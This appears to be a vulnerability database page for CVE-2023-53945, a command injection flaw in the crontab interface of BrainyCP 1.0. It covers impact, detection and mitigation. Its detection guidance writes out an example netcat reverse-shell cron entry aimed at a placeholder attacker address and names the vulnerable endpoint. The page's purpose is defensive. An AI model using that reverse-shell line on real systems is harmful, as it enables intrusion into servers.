CVE-2023-53945
Unknown Unknown - Not Provided
Authenticated Remote Code Execution via Crontab in BrainyCP

Publication date: 2025-12-19

Last updated on: 2025-12-19

Assigner: VulnCheck

Description
BrainyCP 1.0 contains an authenticated remote code execution vulnerability that allows logged-in users to inject arbitrary commands through the crontab configuration interface. Attackers can exploit the crontab endpoint by adding a malicious command that spawns a reverse shell to a specified IP and port.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-12-19
Last Modified
2025-12-19
Generated
2026-06-16
AI Q&A
2025-12-20
EPSS Evaluated
2026-06-15
NVD
CVE-2023-53945
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
brainycp brainycp 1.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2023-53945 is an authenticated remote code execution vulnerability in BrainyCP version 1.0. It allows logged-in users to inject arbitrary OS commands through the crontab configuration interface. Attackers can exploit this by adding a malicious cron job that executes commands such as spawning a reverse shell to a specified IP and port, enabling remote control of the affected system. [1, 2]

Impact Analysis

This vulnerability can allow an authenticated attacker to execute arbitrary commands on your server remotely. By injecting malicious cron jobs, an attacker can gain remote shell access, potentially leading to full system compromise, data theft, service disruption, or further attacks within your network. [1, 2]

Detection Guidance

This vulnerability can be detected by checking the crontab entries for any suspicious or unauthorized commands, especially those that spawn reverse shells using netcat (nc). You can inspect the cron jobs configured via the BrainyCP crontab interface. For example, on the server, run the command `crontab -l` for the affected user to list cron jobs and look for entries like `* * * * * nc <attacker_ip> <attacker_port> -e /bin/bash`. Additionally, monitoring HTTP POST requests to the endpoint `/index.php?do=crontab&subdo=ajax&subaction=addcron` can help detect attempts to add malicious cron jobs. Network monitoring tools can also be used to detect outgoing connections to suspicious IP addresses and ports that may indicate reverse shell activity. [2]

Mitigation Strategies

Immediate mitigation steps include restricting access to the BrainyCP crontab configuration interface to trusted users only, ensuring that only authorized and authenticated users can add or modify cron jobs. Apply strict input validation and sanitization on the crontab interface to prevent command injection. If possible, update BrainyCP to a version where this vulnerability is fixed. As a temporary measure, monitor and remove any suspicious cron jobs that execute reverse shell commands. Additionally, consider network-level controls such as firewall rules to block outgoing connections to untrusted IP addresses and ports commonly used for reverse shells. [1, 2]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2023-53945. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart